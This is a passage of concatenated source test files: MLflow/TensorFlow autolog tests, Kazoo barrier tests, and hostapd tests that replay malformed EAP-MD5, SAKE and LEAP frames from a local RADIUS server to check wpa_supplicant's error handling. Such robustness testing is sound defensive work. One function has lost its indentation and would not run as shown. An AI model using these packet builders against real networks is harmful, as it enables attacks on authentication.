    Version(tf.__version__) < Version("2.6.0"),
    reason=("TensorFlow only has a hard dependency on Keras in version >= 2.6.0"),
)
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_fluent_autolog_with_tf_keras_preserves_v2_model_reference():
    """
    Verifies that, in TensorFlow >= 2.6.0, `tensorflow.keras.Model` refers to the correct class in
    the correct module after `mlflow.autolog()` is called, guarding against previously identified
    compatibility issues between recent versions of TensorFlow and MLflow's internal utility for
    setting up autologging import hooks.
    """
    mlflow.autolog()

    import tensorflow.keras
    from keras.api._v2.keras import Model as ModelV2

    # The import hook must not have swapped in a different Model class.
    assert tensorflow.keras.Model is ModelV2
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_tensorflow_with_fluent_autolog_enables_tf_autologging():
    """Importing tensorflow after fluent `mlflow.autolog()` activates TF autologging."""
    mlflow.autolog()
    import tensorflow  # pylint: disable=unused-variable,unused-import,reimported

    assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)

    # NB: In Tensorflow >= 2.6, we redirect keras autologging to tensorflow autologging
    # so the original keras autologging is disabled
    if Version(tf.__version__) >= Version("2.6"):
        import keras  # pylint: disable=unused-variable,unused-import

        assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
@pytest.mark.large
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_tf_keras_with_fluent_autolog_enables_tf_autologging():
    """Importing tensorflow.keras after fluent autolog activates TF autologging."""
    mlflow.autolog()
    import tensorflow.keras  # pylint: disable=unused-variable,unused-import

    assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)

    # NB: In Tensorflow >= 2.6, we redirect keras autologging to tensorflow autologging
    # so the original keras autologging is disabled
    if Version(tf.__version__) >= Version("2.6"):
        # NB: For TF >= 2.6, import tensorflow.keras will trigger importing keras
        assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
@pytest.mark.large
@pytest.mark.skipif(
    Version(tf.__version__) < Version("2.6.0"),
    reason=("TensorFlow autologging is not used for vanilla Keras models in Keras < 2.6.0"),
)
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_keras_with_fluent_autolog_enables_tensorflow_autologging():
    """Importing vanilla keras routes autologging through the tensorflow flavor."""
    mlflow.autolog()
    import keras  # pylint: disable=unused-variable,unused-import

    assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
    # Keras autologging is redirected to (and therefore disabled in favor of) TF autologging.
    assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
|
test_barrier.py | import threading
from nose.tools import eq_
from kazoo.testing import KazooTestCase
class KazooBarrierTests(KazooTestCase):
    """Tests for the single (one-sided) Barrier recipe."""

    def test_barrier_not_exist(self):
        # With no barrier node present, wait() passes immediately.
        barrier = self.client.Barrier("/some/path")
        eq_(barrier.wait(), True)

    def test_barrier_exists(self):
        barrier = self.client.Barrier("/some/path")
        barrier.create()
        # A zero-timeout wait on an existing barrier does not pass.
        eq_(barrier.wait(0), False)
        barrier.remove()
        eq_(barrier.wait(), True)

    def test_remove_nonexistent_barrier(self):
        barrier = self.client.Barrier("/some/path")
        # Removing a barrier that was never created reports False.
        eq_(barrier.remove(), False)
class KazooDoubleBarrierTests(KazooTestCase):
    """Tests for the DoubleBarrier recipe (enter/leave synchronization)."""

    def test_basic_barrier(self):
        # With num_clients=1, a single client can enter and leave on its own.
        b = self.client.DoubleBarrier("/some/path", 1)
        eq_(b.participating, False)
        b.enter()
        eq_(b.participating, True)
        b.leave()
        eq_(b.participating, False)

    def test_two_barrier(self):
        # Events sequencing the workers with the test thread: ev/av signal
        # progress of barrier one/two, bv gates thread two's start, and
        # release_all tells both workers to leave the barrier.
        av = threading.Event()
        ev = threading.Event()
        bv = threading.Event()
        release_all = threading.Event()
        b1 = self.client.DoubleBarrier("/some/path", 2)
        b2 = self.client.DoubleBarrier("/some/path", 2)

        def make_barrier_one():
            b1.enter()
            ev.set()
            release_all.wait()
            b1.leave()
            ev.set()

        def make_barrier_two():
            bv.wait()
            b2.enter()
            av.set()
            release_all.wait()
            b2.leave()
            av.set()

        # Spin up both of them
        t1 = threading.Thread(target=make_barrier_one)
        t1.start()
        t2 = threading.Thread(target=make_barrier_two)
        t2.start()
        eq_(b1.participating, False)
        eq_(b2.participating, False)
        bv.set()

        # Both workers have entered once av and ev are set.
        av.wait()
        ev.wait()
        eq_(b1.participating, True)
        eq_(b2.participating, True)

        av.clear()
        ev.clear()
        release_all.set()
        av.wait()
        ev.wait()
        eq_(b1.participating, False)
        eq_(b2.participating, False)
        t1.join()
        t2.join()

    def test_three_barrier(self):
        av = threading.Event()
        ev = threading.Event()
        bv = threading.Event()
        release_all = threading.Event()
        b1 = self.client.DoubleBarrier("/some/path", 3)
        b2 = self.client.DoubleBarrier("/some/path", 3)
        b3 = self.client.DoubleBarrier("/some/path", 3)

        def make_barrier_one():
            b1.enter()
            ev.set()
            release_all.wait()
            b1.leave()
            ev.set()

        def make_barrier_two():
            bv.wait()
            b2.enter()
            av.set()
            release_all.wait()
            b2.leave()
            av.set()

        # Spin up both of them
        t1 = threading.Thread(target=make_barrier_one)
        t1.start()
        t2 = threading.Thread(target=make_barrier_two)
        t2.start()
        eq_(b1.participating, False)
        eq_(b2.participating, False)
        bv.set()

        # The barrier needs all three participants: with only two entered,
        # no one is participating yet.
        eq_(b1.participating, False)
        eq_(b2.participating, False)

        # The test thread itself acts as the third participant, releasing the others.
        b3.enter()
        ev.wait()
        av.wait()
        eq_(b1.participating, True)
        eq_(b2.participating, True)
        eq_(b3.participating, True)

        av.clear()
        ev.clear()
        release_all.set()
        b3.leave()
        av.wait()
        ev.wait()
        eq_(b1.participating, False)
        eq_(b2.participating, False)
        eq_(b3.participating, False)
        t1.join()
        t2.join()

    def test_barrier_existing_parent_node(self):
        b = self.client.DoubleBarrier('/some/path', 1)
        self.assertFalse(b.participating)
        self.client.create('/some', ephemeral=True)
        # the barrier cannot create children under an ephemeral node
        b.enter()
        self.assertFalse(b.participating)

    def test_barrier_existing_node(self):
        b = self.client.DoubleBarrier('/some', 1)
        self.assertFalse(b.participating)
        self.client.ensure_path(b.path)
        self.client.create(b.create_path, ephemeral=True)
        # the barrier will re-use an existing node
        b.enter()
        self.assertTrue(b.participating)
        b.leave()
|
test_eap_proto.py | # EAP protocol tests
# Copyright (c) 2014, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import hmac
import logging
logger = logging.getLogger()
import select
import struct
import threading
import time
import hostapd
# EAP packet codes.
EAP_CODE_REQUEST = 1
EAP_CODE_RESPONSE = 2
EAP_CODE_SUCCESS = 3
EAP_CODE_FAILURE = 4

# EAP method type values used when building test frames.
EAP_TYPE_IDENTITY = 1
EAP_TYPE_NOTIFICATION = 2
EAP_TYPE_NAK = 3
EAP_TYPE_MD5 = 4
EAP_TYPE_OTP = 5
EAP_TYPE_GTC = 6
EAP_TYPE_TLS = 13
EAP_TYPE_LEAP = 17
EAP_TYPE_SIM = 18
EAP_TYPE_TTLS = 21
EAP_TYPE_AKA = 23
EAP_TYPE_PEAP = 25
EAP_TYPE_MSCHAPV2 = 26
EAP_TYPE_TLV = 33
EAP_TYPE_TNC = 38
EAP_TYPE_FAST = 43
EAP_TYPE_PAX = 46
EAP_TYPE_PSK = 47
EAP_TYPE_SAKE = 48
EAP_TYPE_IKEV2 = 49
EAP_TYPE_AKA_PRIME = 50
EAP_TYPE_GPSK = 51
EAP_TYPE_PWD = 52
EAP_TYPE_EKE = 53
def run_pyrad_server(srv, t_stop, eap_handler):
    """Thread target: run the pyrad test server until `t_stop` is set."""
    srv.RunWithStop(t_stop, eap_handler)
def start_radius_server(eap_handler):
    """Start a pyrad-based test RADIUS server on localhost.

    `eap_handler(ctx, eap)` is invoked for each received EAP message and must
    return the next EAP request to send (or None). Returns a dict holding the
    server, its stop event and its thread, or None if pyrad is unavailable
    (callers treat None as "skip this test").
    """
    try:
        import pyrad.server
        import pyrad.packet
        import pyrad.dictionary
    except ImportError:
        return None

    class TestServer(pyrad.server.Server):
        def _HandleAuthPacket(self, pkt):
            pyrad.server.Server._HandleAuthPacket(self, pkt)
            # Attribute 79 is EAP-Message.
            if len(pkt[79]) > 1:
                logger.info("Multiple EAP-Message attributes")
                # TODO: reassemble
            eap = pkt[79][0]
            eap_req = self.eap_handler(self.ctx, eap)
            reply = self.CreateReplyPacket(pkt)
            if eap_req:
                if len(eap_req) > 253:
                    logger.info("Need to fragment EAP-Message")
                    # TODO: fragment
                reply.AddAttribute("EAP-Message", eap_req)
            else:
                logger.info("No EAP request available")
            reply.code = pyrad.packet.AccessChallenge

            # Compute Message-Authenticator over code, id, length, the request
            # authenticator, and the encoded attributes (with a zeroed placeholder
            # in place of the final digest).
            hmac_obj = hmac.new(reply.secret)
            hmac_obj.update(struct.pack("B", reply.code))
            hmac_obj.update(struct.pack("B", reply.id))

            # reply attributes
            reply.AddAttribute("Message-Authenticator",
                               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
            attrs = reply._PktEncodeAttributes()

            # Length
            flen = 4 + 16 + len(attrs)
            hmac_obj.update(struct.pack(">H", flen))
            hmac_obj.update(pkt.authenticator)
            hmac_obj.update(attrs)
            # Replace the zeroed placeholder (attribute 80) with the real digest.
            del reply[80]
            reply.AddAttribute("Message-Authenticator", hmac_obj.digest())

            self.SendReplyPacket(pkt.fd, reply)

        def RunWithStop(self, t_stop, eap_handler):
            """Serve incoming packets until the `t_stop` event is set."""
            self._poll = select.poll()
            self._fdmap = {}
            self._PrepareSockets()
            self.t_stop = t_stop
            self.eap_handler = eap_handler
            self.ctx = {}

            while not t_stop.is_set():
                # 1000 ms poll timeout so the stop event is rechecked regularly.
                for (fd, event) in self._poll.poll(1000):
                    if event == select.POLLIN:
                        try:
                            fdo = self._fdmap[fd]
                            self._ProcessInput(fdo)
                        except pyrad.server.ServerPacketError as err:
                            logger.info("pyrad server dropping packet: " + str(err))
                        except pyrad.packet.PacketError as err:
                            logger.info("pyrad server received invalid packet: " + str(err))
                    else:
                        logger.error("Unexpected event in pyrad server main loop")

    srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
                     authport=18138, acctport=18139)
    srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
                                                     "radius",
                                                     "localhost")
    srv.BindToAddress("")
    t_stop = threading.Event()
    t = threading.Thread(target=run_pyrad_server, args=(srv, t_stop, eap_handler))
    t.start()

    return { 'srv': srv, 'stop': t_stop, 'thread': t }
def stop_radius_server(srv):
    """Signal the pyrad server loop to stop and wait for its worker thread to exit."""
    stop_event, worker = srv['stop'], srv['thread']
    stop_event.set()
    worker.join()
def start_ap(ifname):
    """Start a WPA2-Enterprise AP that authenticates against the local test RADIUS server."""
    params = hostapd.wpa2_eap_params(ssid="eap-test")
    # Point the AP at the pyrad test server started by start_radius_server().
    params['auth_server_port'] = "18138"
    hapd = hostapd.add_ap(ifname, params)
    return hapd
def test_eap_proto(dev, apdev):
"""EAP protocol tests"""
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success - id off by 2")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success - id off by 3")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 2, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('A'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('B'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('C'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('D'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('E'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request (same id)")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'] - 1,
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('F'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 2, 4)
return None
srv = start_radius_server(eap_handler)
if srv is None:
return "skip"
try:
hapd = start_ap(apdev[0]['ifname'])
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=1)
if ev is not None:
raise Exception("Unexpected EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION A":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION B":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION C":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION D":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION E":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION F":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
# EAP-SAKE protocol constants (RFC 4763)
EAP_SAKE_VERSION = 2
# EAP-SAKE message subtypes
EAP_SAKE_SUBTYPE_CHALLENGE = 1
EAP_SAKE_SUBTYPE_CONFIRM = 2
EAP_SAKE_SUBTYPE_AUTH_REJECT = 3
EAP_SAKE_SUBTYPE_IDENTITY = 4
# EAP-SAKE attribute types
EAP_SAKE_AT_RAND_S = 1
EAP_SAKE_AT_RAND_P = 2
EAP_SAKE_AT_MIC_S = 3
EAP_SAKE_AT_MIC_P = 4
EAP_SAKE_AT_SERVERID = 5
EAP_SAKE_AT_PEERID = 6
EAP_SAKE_AT_SPI_S = 7
EAP_SAKE_AT_SPI_P = 8
EAP_SAKE_AT_ANY_ID_REQ = 9
EAP_SAKE_AT_PERM_ID_REQ = 10
EAP_SAKE_AT_ENCR_DATA = 128
EAP_SAKE_AT_IV = 129
EAP_SAKE_AT_PADDING = 130
EAP_SAKE_AT_NEXT_TMPID = 131
EAP_SAKE_AT_MSK_LIFE = 132
def test_eap_proto_sake(dev, apdev):
    """EAP-SAKE protocol tests

    Drive the wpa_supplicant EAP-SAKE peer through a scripted sequence of
    malformed, truncated, and out-of-order server messages (missing
    attributes, unknown subtypes, unexpected exchanges) to exercise its
    protocol validation and error paths.
    """
    def sake_challenge(ctx):
        # Helper: a minimal Challenge subtype message carrying AT_RAND_S
        # (attribute length 18 = 2-octet header + 16-octet value).
        logger.info("Test: Challenge subtype")
        return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
                           4 + 1 + 3 + 18,
                           EAP_TYPE_SAKE,
                           EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
                           EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)
    def sake_handler(ctx, req):
        # Scripted server: ctx['num'] counts requests received so far and
        # selects which canned response to send; ctx['id'] is the EAP id.
        logger.info("sake_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        if ctx['num'] == 1:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'], 4 + 1,
                               EAP_TYPE_SAKE)
        if ctx['num'] == 2:
            logger.info("Test: Identity subtype without any attributes")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY)
        if ctx['num'] == 3:
            logger.info("Test: Identity subtype")
            return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
                               EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
        if ctx['num'] == 4:
            logger.info("Test: Identity subtype (different session id)")
            return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 1, EAP_SAKE_SUBTYPE_IDENTITY,
                               EAP_SAKE_AT_PERM_ID_REQ, 4, 0)
        if ctx['num'] == 5:
            logger.info("Test: Identity subtype with too short attribute")
            return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 2,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
                               EAP_SAKE_AT_ANY_ID_REQ, 2)
        if ctx['num'] == 6:
            logger.info("Test: Identity subtype with truncated attribute")
            return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 2,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
                               EAP_SAKE_AT_ANY_ID_REQ, 4)
        if ctx['num'] == 7:
            logger.info("Test: Unknown subtype")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, 123)
        if ctx['num'] == 8:
            logger.info("Test: Challenge subtype without any attributes")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE)
        if ctx['num'] == 9:
            logger.info("Test: Challenge subtype with too short AT_RAND_S")
            return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 2,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
                               EAP_SAKE_AT_RAND_S, 2)
        if ctx['num'] == 10:
            return sake_challenge(ctx)
        if ctx['num'] == 11:
            logger.info("Test: Unexpected Identity subtype")
            return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
                               EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
        if ctx['num'] == 12:
            return sake_challenge(ctx)
        if ctx['num'] == 13:
            logger.info("Test: Unexpected Challenge subtype")
            return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 18,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
                               EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)
        if ctx['num'] == 14:
            return sake_challenge(ctx)
        if ctx['num'] == 15:
            logger.info("Test: Confirm subtype without any attributes")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM)
        if ctx['num'] == 16:
            return sake_challenge(ctx)
        if ctx['num'] == 17:
            logger.info("Test: Confirm subtype with too short AT_MIC_S")
            return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 2,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
                               EAP_SAKE_AT_MIC_S, 2)
        if ctx['num'] == 18:
            logger.info("Test: Unexpected Confirm subtype")
            return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 18,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
                               EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)
        if ctx['num'] == 19:
            return sake_challenge(ctx)
        if ctx['num'] == 20:
            logger.info("Test: Confirm subtype with incorrect AT_MIC_S")
            return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 18,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
                               EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)
        # Default after the scripted cases: keep sending a valid challenge.
        return sake_challenge(ctx)
    srv = start_radius_server(sake_handler)
    if srv is None:
        return "skip"
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # Each iteration restarts EAP authentication; the handler above
        # advances through its scripted error cases one exchange at a time.
        for i in range(0, 14):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="SAKE", identity="sake user",
                           password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")
        # Local error case in the peer: PSK shorter than required length.
        logger.info("Too short password")
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="SAKE", identity="sake user",
                       password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcd",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        time.sleep(0.1)
    finally:
        stop_radius_server(srv)
def test_eap_proto_leap(dev, apdev):
    """EAP-LEAP protocol tests

    Exercise the wpa_supplicant EAP-LEAP peer with invalid versions,
    bad challenge lengths, and malformed Response-direction frames in
    both halves of the mutual-authentication exchange.
    """
    def leap_handler(ctx, req):
        # Scripted server: ctx['num'] counts requests received so far and
        # selects which canned response to send; ctx['id'] is the EAP id.
        logger.info("leap_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        if ctx['num'] == 1:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_LEAP)
        if ctx['num'] == 2:
            logger.info("Test: Unexpected version")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_LEAP,
                               0, 0, 0)
        if ctx['num'] == 3:
            logger.info("Test: Invalid challenge length")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_LEAP,
                               1, 0, 0)
        if ctx['num'] == 4:
            logger.info("Test: Truncated challenge")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_LEAP,
                               1, 0, 8)
        if ctx['num'] == 5:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        if ctx['num'] == 6:
            logger.info("Test: Missing payload in Response")
            return struct.pack(">BBHB", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1,
                               EAP_TYPE_LEAP)
        if ctx['num'] == 7:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
